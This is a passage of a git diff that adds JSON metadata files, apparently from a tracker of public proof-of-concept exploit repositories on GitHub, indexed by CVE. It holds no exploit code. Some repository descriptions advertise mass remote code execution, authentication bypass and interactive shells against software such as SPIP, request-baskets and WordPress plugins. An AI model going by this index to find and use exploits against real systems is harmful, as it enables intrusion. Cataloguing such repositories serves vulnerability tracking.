+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26469.json b/2023/CVE-2023-26469.json
new file mode 100644
index 0000000000..fe4ca307c9
--- /dev/null
+++ b/2023/CVE-2023-26469.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 685910808,
+ "name": "CVE-2023-26469",
+ "full_name": "d0rb\/CVE-2023-26469",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-26469",
+ "description": "CVE-2023-26469 REC PoC",
+ "fork": false,
+ "created_at": "2023-09-01T09:41:32Z",
+ "updated_at": "2024-06-21T00:11:29Z",
+ "pushed_at": "2023-09-01T09:46:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26602.json b/2023/CVE-2023-26602.json
new file mode 100644
index 0000000000..615a8d84af
--- /dev/null
+++ b/2023/CVE-2023-26602.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 744065657,
+ "name": "CVE-2023-26602",
+ "full_name": "D1G17\/CVE-2023-26602",
+ "owner": {
+ "login": "D1G17",
+ "id": 156820616,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156820616?v=4",
+ "html_url": "https:\/\/github.com\/D1G17"
+ },
+ "html_url": "https:\/\/github.com\/D1G17\/CVE-2023-26602",
+ "description": "Exploit information for CVE-2023-26602 ",
+ "fork": false,
+ "created_at": "2024-01-16T15:01:33Z",
+ "updated_at": "2024-01-16T15:01:33Z",
+ "pushed_at": "2024-01-16T15:04:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26607.json b/2023/CVE-2023-26607.json
new file mode 100644
index 0000000000..38ef4252c1
--- /dev/null
+++ b/2023/CVE-2023-26607.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 691911118,
+ "name": "linux-4.1.15_CVE-2023-26607",
+ "full_name": "Trinadh465\/linux-4.1.15_CVE-2023-26607",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2023-26607",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-15T06:42:36Z",
+ "updated_at": "2023-09-15T06:47:20Z",
+ "pushed_at": "2023-09-15T08:37:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26609.json b/2023/CVE-2023-26609.json
new file mode 100644
index 0000000000..8f98b2987c
--- /dev/null
+++ b/2023/CVE-2023-26609.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 744066325,
+ "name": "CVE-2023-26609",
+ "full_name": "D1G17\/CVE-2023-26609",
+ "owner": {
+ "login": "D1G17",
+ "id": 156820616,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156820616?v=4",
+ "html_url": "https:\/\/github.com\/D1G17"
+ },
+ "html_url": "https:\/\/github.com\/D1G17\/CVE-2023-26609",
+ "description": "Exploit information for CVE-2023-26609 ",
+ "fork": false,
+ "created_at": "2024-01-16T15:02:39Z",
+ "updated_at": "2024-01-16T15:02:40Z",
+ "pushed_at": "2024-01-16T15:05:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26818.json b/2023/CVE-2023-26818.json
new file mode 100644
index 0000000000..1fc8cef51d
--- /dev/null
+++ b/2023/CVE-2023-26818.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 685061399,
+ "name": "CVE-2023-26818",
+ "full_name": "Zeyad-Azima\/CVE-2023-26818",
+ "owner": {
+ "login": "Zeyad-Azima",
+ "id": 62406753,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62406753?v=4",
+ "html_url": "https:\/\/github.com\/Zeyad-Azima"
+ },
+ "html_url": "https:\/\/github.com\/Zeyad-Azima\/CVE-2023-26818",
+ "description": "CVE-2023-26818 Exploit MacOS TCC Bypass W\/ Telegram",
+ "fork": false,
+ "created_at": "2023-08-30T12:40:50Z",
+ "updated_at": "2024-06-09T10:36:48Z",
+ "pushed_at": "2024-06-06T20:14:42Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-27100.json b/2023/CVE-2023-27100.json
new file mode 100644
index 0000000000..c2de697a15
--- /dev/null
+++ b/2023/CVE-2023-27100.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 803311875,
+ "name": "CVE-2023-27100",
+ "full_name": "fabdotnet\/CVE-2023-27100",
+ "owner": {
+ "login": "fabdotnet",
+ "id": 169522306,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169522306?v=4",
+ "html_url": "https:\/\/github.com\/fabdotnet"
+ },
+ "html_url": "https:\/\/github.com\/fabdotnet\/CVE-2023-27100",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-20T13:35:39Z",
+ "updated_at": "2024-05-20T13:37:25Z",
+ "pushed_at": "2024-05-20T13:37:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-27163.json b/2023/CVE-2023-27163.json
new file mode 100644
index 0000000000..37c8998aaa
--- /dev/null
+++ b/2023/CVE-2023-27163.json
@@ -0,0 +1,467 @@
+[
+ {
+ "id": 665224442,
+ "name": "CVE-2023-27163",
+ "full_name": "entr0pie\/CVE-2023-27163",
+ "owner": {
+ "login": "entr0pie",
+ "id": 73120825,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73120825?v=4",
+ "html_url": "https:\/\/github.com\/entr0pie"
+ },
+ "html_url": "https:\/\/github.com\/entr0pie\/CVE-2023-27163",
+ "description": "Proof-of-Concept for Server Side Request Forgery (SSRF) in request-baskets (<= v.1.2.1)",
+ "fork": false,
+ "created_at": "2023-07-11T18:08:05Z",
+ "updated_at": "2024-05-15T15:30:35Z",
+ "pushed_at": "2023-08-09T15:11:09Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cybersecurity",
+ "exploit",
+ "go",
+ "golang",
+ "poc",
+ "python3",
+ "request-baskets",
+ "server-side-request-forgery",
+ "ssrf"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 668120487,
+ "name": "cve-2023-27163",
+ "full_name": "seanrdev\/cve-2023-27163",
+ "owner": {
+ "login": "seanrdev",
+ "id": 20375619,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20375619?v=4",
+ "html_url": "https:\/\/github.com\/seanrdev"
+ },
+ "html_url": "https:\/\/github.com\/seanrdev\/cve-2023-27163",
+ "description": "To assist in enumerating the webserver behind the webserver SSRF CVE-2023-27163",
+ "fork": false,
+ "created_at": "2023-07-19T04:35:58Z",
+ "updated_at": "2023-07-31T23:33:29Z",
+ "pushed_at": "2023-07-22T05:56:55Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 668492282,
+ "name": "CVE-2023-27163",
+ "full_name": "overgrowncarrot1\/CVE-2023-27163",
+ "owner": {
+ "login": "overgrowncarrot1",
+ "id": 78485709,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78485709?v=4",
+ "html_url": "https:\/\/github.com\/overgrowncarrot1"
+ },
+ "html_url": "https:\/\/github.com\/overgrowncarrot1\/CVE-2023-27163",
+ "description": "CVE-2023-27163",
+ "fork": false,
+ "created_at": "2023-07-20T00:18:38Z",
+ "updated_at": "2023-07-20T00:19:34Z",
+ "pushed_at": "2023-07-20T00:58:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 671018679,
+ "name": "CVE-2023-27163-POC",
+ "full_name": "ThickCoco\/CVE-2023-27163-POC",
+ "owner": {
+ "login": "ThickCoco",
+ "id": 26300723,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26300723?v=4",
+ "html_url": "https:\/\/github.com\/ThickCoco"
+ },
+ "html_url": "https:\/\/github.com\/ThickCoco\/CVE-2023-27163-POC",
+ "description": "Poc of SSRF for Request-Baskets (CVE-2023-27163)",
+ "fork": false,
+ "created_at": "2023-07-26T11:00:59Z",
+ "updated_at": "2024-05-06T08:14:42Z",
+ "pushed_at": "2023-07-26T13:35:04Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 671124763,
+ "name": "CVE-2023-27163",
+ "full_name": "davuXVI\/CVE-2023-27163",
+ "owner": {
+ "login": "davuXVI",
+ "id": 99289325,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99289325?v=4",
+ "html_url": "https:\/\/github.com\/davuXVI"
+ },
+ "html_url": "https:\/\/github.com\/davuXVI\/CVE-2023-27163",
+ "description": "PoC CVE-2023-27163, SSRF, request-baskets hasta v1.2.1",
+ "fork": false,
+ "created_at": "2023-07-26T15:37:26Z",
+ "updated_at": "2023-08-05T10:44:44Z",
+ "pushed_at": "2023-07-26T16:20:43Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 674953694,
+ "name": "CVE-2023-27163-AND-Mailtrail-v0.53",
+ "full_name": "HusenjanDev\/CVE-2023-27163-AND-Mailtrail-v0.53",
+ "owner": {
+ "login": "HusenjanDev",
+ "id": 88688451,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88688451?v=4",
+ "html_url": "https:\/\/github.com\/HusenjanDev"
+ },
+ "html_url": "https:\/\/github.com\/HusenjanDev\/CVE-2023-27163-AND-Mailtrail-v0.53",
+ "description": "Requests Baskets (CVE-2023-27163) and Mailtrail v0.53",
+ "fork": false,
+ "created_at": "2023-08-05T09:32:00Z",
+ "updated_at": "2024-01-07T07:09:20Z",
+ "pushed_at": "2023-08-05T09:36:18Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 676501688,
+ "name": "CVE-2023-27163",
+ "full_name": "rvizx\/CVE-2023-27163",
+ "owner": {
+ "login": "rvizx",
+ "id": 84989569,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4",
+ "html_url": "https:\/\/github.com\/rvizx"
+ },
+ "html_url": "https:\/\/github.com\/rvizx\/CVE-2023-27163",
+ "description": "CVE-2023-27163 - Request Baskets SSRF",
+ "fork": false,
+ "created_at": "2023-08-09T10:47:01Z",
+ "updated_at": "2023-08-10T05:46:57Z",
+ "pushed_at": "2023-08-09T20:44:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-27163",
+ "exploit",
+ "request-baskets",
+ "ssrf"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 677914975,
+ "name": "CVE-2023-27163",
+ "full_name": "thomas-osgood\/CVE-2023-27163",
+ "owner": {
+ "login": "thomas-osgood",
+ "id": 20747585,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20747585?v=4",
+ "html_url": "https:\/\/github.com\/thomas-osgood"
+ },
+ "html_url": "https:\/\/github.com\/thomas-osgood\/CVE-2023-27163",
+ "description": "Golang PoC for CVE-2023-27163 Mailtrail Exploit",
+ "fork": false,
+ "created_at": "2023-08-13T04:19:50Z",
+ "updated_at": "2023-08-14T02:19:34Z",
+ "pushed_at": "2023-08-14T06:11:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 677969095,
+ "name": "CVE-2023-27163",
+ "full_name": "cowsecurity\/CVE-2023-27163",
+ "owner": {
+ "login": "cowsecurity",
+ "id": 74612612,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74612612?v=4",
+ "html_url": "https:\/\/github.com\/cowsecurity"
+ },
+ "html_url": "https:\/\/github.com\/cowsecurity\/CVE-2023-27163",
+ "description": "CVE-2023-27163 Request-Baskets v1.2.1 - Server-side request forgery (SSRF)",
+ "fork": false,
+ "created_at": "2023-08-13T08:49:24Z",
+ "updated_at": "2023-08-13T08:52:33Z",
+ "pushed_at": "2023-08-13T09:04:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 684184490,
+ "name": "CVE-2023-27163-InternalProber",
+ "full_name": "samh4cks\/CVE-2023-27163-InternalProber",
+ "owner": {
+ "login": "samh4cks",
+ "id": 63656641,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63656641?v=4",
+ "html_url": "https:\/\/github.com\/samh4cks"
+ },
+ "html_url": "https:\/\/github.com\/samh4cks\/CVE-2023-27163-InternalProber",
+ "description": "A tool to perform port scanning using vulnerable Request-Baskets",
+ "fork": false,
+ "created_at": "2023-08-28T16:19:21Z",
+ "updated_at": "2023-10-25T18:01:52Z",
+ "pushed_at": "2023-08-28T17:52:19Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 694447661,
+ "name": "CVE-2023-27163",
+ "full_name": "Hamibubu\/CVE-2023-27163",
+ "owner": {
+ "login": "Hamibubu",
+ "id": 108554878,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108554878?v=4",
+ "html_url": "https:\/\/github.com\/Hamibubu"
+ },
+ "html_url": "https:\/\/github.com\/Hamibubu\/CVE-2023-27163",
+ "description": "Python implementation of CVE-2023-27163",
+ "fork": false,
+ "created_at": "2023-09-21T02:43:02Z",
+ "updated_at": "2023-09-21T02:55:11Z",
+ "pushed_at": "2023-09-21T03:05:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 733795826,
+ "name": "basketcraft",
+ "full_name": "KharimMchatta\/basketcraft",
+ "owner": {
+ "login": "KharimMchatta",
+ "id": 47448636,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47448636?v=4",
+ "html_url": "https:\/\/github.com\/KharimMchatta"
+ },
+ "html_url": "https:\/\/github.com\/KharimMchatta\/basketcraft",
+ "description": "this is a script that exploits the CVE-2023-27163 vulnerability which is request-basket SSRF",
+ "fork": false,
+ "created_at": "2023-12-20T06:29:18Z",
+ "updated_at": "2024-01-05T18:44:44Z",
+ "pushed_at": "2023-12-20T07:00:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 736614226,
+ "name": "CVE-2023-27163",
+ "full_name": "MasterCode112\/CVE-2023-27163",
+ "owner": {
+ "login": "MasterCode112",
+ "id": 105772414,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105772414?v=4",
+ "html_url": "https:\/\/github.com\/MasterCode112"
+ },
+ "html_url": "https:\/\/github.com\/MasterCode112\/CVE-2023-27163",
+ "description": "Proof of Concept for Server Side Request Forgery (SSRF) in request-baskets (V<= v.1.2.1)",
+ "fork": false,
+ "created_at": "2023-12-28T11:36:37Z",
+ "updated_at": "2023-12-28T11:45:13Z",
+ "pushed_at": "2024-01-10T07:57:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 739001610,
+ "name": "CVE-2023-27163",
+ "full_name": "Rubioo02\/CVE-2023-27163",
+ "owner": {
+ "login": "Rubioo02",
+ "id": 153825296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153825296?v=4",
+ "html_url": "https:\/\/github.com\/Rubioo02"
+ },
+ "html_url": "https:\/\/github.com\/Rubioo02\/CVE-2023-27163",
+ "description": "A exploit for the CVE-2023-27163 (SSRF) vulnerability in the web application request-baskets (<= v.1.2.1)",
+ "fork": false,
+ "created_at": "2024-01-04T14:46:13Z",
+ "updated_at": "2024-01-04T17:04:49Z",
+ "pushed_at": "2024-01-04T16:40:47Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 739760866,
+ "name": "CVE-2023-27163",
+ "full_name": "madhavmehndiratta\/CVE-2023-27163",
+ "owner": {
+ "login": "madhavmehndiratta",
+ "id": 43489174,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43489174?v=4",
+ "html_url": "https:\/\/github.com\/madhavmehndiratta"
+ },
+ "html_url": "https:\/\/github.com\/madhavmehndiratta\/CVE-2023-27163",
+ "description": "PoC for SSRF in request-baskets v1.2.1 (CVE-2023-27163)",
+ "fork": false,
+ "created_at": "2024-01-06T13:16:29Z",
+ "updated_at": "2024-01-06T15:53:16Z",
+ "pushed_at": "2024-01-06T15:52:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2732.json b/2023/CVE-2023-2732.json
new file mode 100644
index 0000000000..94ff27e8b5
--- /dev/null
+++ b/2023/CVE-2023-2732.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 674914853,
+ "name": "CVE-2023-2732",
+ "full_name": "ThatNotEasy\/CVE-2023-2732",
+ "owner": {
+ "login": "ThatNotEasy",
+ "id": 25004320,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4",
+ "html_url": "https:\/\/github.com\/ThatNotEasy"
+ },
+ "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-2732",
+ "description": "Perform With Massive Authentication Bypass (Wordpress Mstore-API)",
+ "fork": false,
+ "created_at": "2023-08-05T06:38:53Z",
+ "updated_at": "2023-10-17T17:20:52Z",
+ "pushed_at": "2023-08-05T06:43:33Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "authentication",
+ "bypass",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-27350.json b/2023/CVE-2023-27350.json
new file mode 100644
index 0000000000..21ce034041
--- /dev/null
+++ b/2023/CVE-2023-27350.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 788787317,
+ "name": "CVE-2023-27350",
+ "full_name": "ASG-CASTLE\/CVE-2023-27350",
+ "owner": {
+ "login": "ASG-CASTLE",
+ "id": 160751832,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160751832?v=4",
+ "html_url": "https:\/\/github.com\/ASG-CASTLE"
+ },
+ "html_url": "https:\/\/github.com\/ASG-CASTLE\/CVE-2023-27350",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-19T04:47:10Z",
+ "updated_at": "2024-04-19T04:47:11Z",
+ "pushed_at": "2024-04-19T04:51:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 798859972,
+ "name": "CVE-2023-27350",
+ "full_name": "rasan2001\/CVE-2023-27350",
+ "owner": {
+ "login": "rasan2001",
+ "id": 156652838,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156652838?v=4",
+ "html_url": "https:\/\/github.com\/rasan2001"
+ },
+ "html_url": "https:\/\/github.com\/rasan2001\/CVE-2023-27350",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-10T16:14:22Z",
+ "updated_at": "2024-05-10T16:15:15Z",
+ "pushed_at": "2024-05-10T16:15:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-27363.json b/2023/CVE-2023-27363.json
new file mode 100644
index 0000000000..76337bd8db
--- /dev/null
+++ b/2023/CVE-2023-27363.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 702915781,
+ "name": "-Foxit-PDF-CVE-2023-27363-",
+ "full_name": "CN016\/-Foxit-PDF-CVE-2023-27363-",
+ "owner": {
+ "login": "CN016",
+ "id": 108575004,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4",
+ "html_url": "https:\/\/github.com\/CN016"
+ },
+ "html_url": "https:\/\/github.com\/CN016\/-Foxit-PDF-CVE-2023-27363-",
+ "description": "福昕Foxit PDF远程代码执行漏洞(CVE-2023-27363)",
+ "fork": false,
+ "created_at": "2023-10-10T08:52:08Z",
+ "updated_at": "2023-10-10T08:52:09Z",
+ "pushed_at": "2023-10-10T09:03:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-27372.json b/2023/CVE-2023-27372.json
new file mode 100644
index 0000000000..e6ff4e7fb9
--- /dev/null
+++ b/2023/CVE-2023-27372.json
@@ -0,0 +1,126 @@
+[
+ {
+ "id": 662629965,
+ "name": "CVE-2023-27372-PoC",
+ "full_name": "0SPwn\/CVE-2023-27372-PoC",
+ "owner": {
+ "login": "0SPwn",
+ "id": 103416140,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103416140?v=4",
+ "html_url": "https:\/\/github.com\/0SPwn"
+ },
+ "html_url": "https:\/\/github.com\/0SPwn\/CVE-2023-27372-PoC",
+ "description": "This is a PoC for CVE-2023-27372 which spawns a fully interactive shell. ",
+ "fork": false,
+ "created_at": "2023-07-05T14:41:03Z",
+ "updated_at": "2023-11-19T06:48:52Z",
+ "pushed_at": "2023-07-05T14:42:24Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 665042042,
+ "name": "CVE-2023-27372-POC",
+ "full_name": "izzz0\/CVE-2023-27372-POC",
+ "owner": {
+ "login": "izzz0",
+ "id": 88706802,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88706802?v=4",
+ "html_url": "https:\/\/github.com\/izzz0"
+ },
+ "html_url": "https:\/\/github.com\/izzz0\/CVE-2023-27372-POC",
+ "description": "CVE-2023-27372-SPIP-CMS-Bypass",
+ "fork": false,
+ "created_at": "2023-07-11T10:00:04Z",
+ "updated_at": "2023-07-19T03:20:54Z",
+ "pushed_at": "2023-07-12T05:14:11Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 673080065,
+ "name": "CVE-2023-27372",
+ "full_name": "ThatNotEasy\/CVE-2023-27372",
+ "owner": {
+ "login": "ThatNotEasy",
+ "id": 25004320,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4",
+ "html_url": "https:\/\/github.com\/ThatNotEasy"
+ },
+ "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-27372",
+ "description": "Perform With Mass Remote Code Execution In SPIP Version (4.2.1)",
+ "fork": false,
+ "created_at": "2023-07-31T20:32:36Z",
+ "updated_at": "2023-09-28T11:46:43Z",
+ "pushed_at": "2023-07-31T20:54:36Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "rce-exploit",
+ "remote-code-execution",
+ "spip-plugin"
+ ],
+ "visibility": "public",
+ "forks": 5,
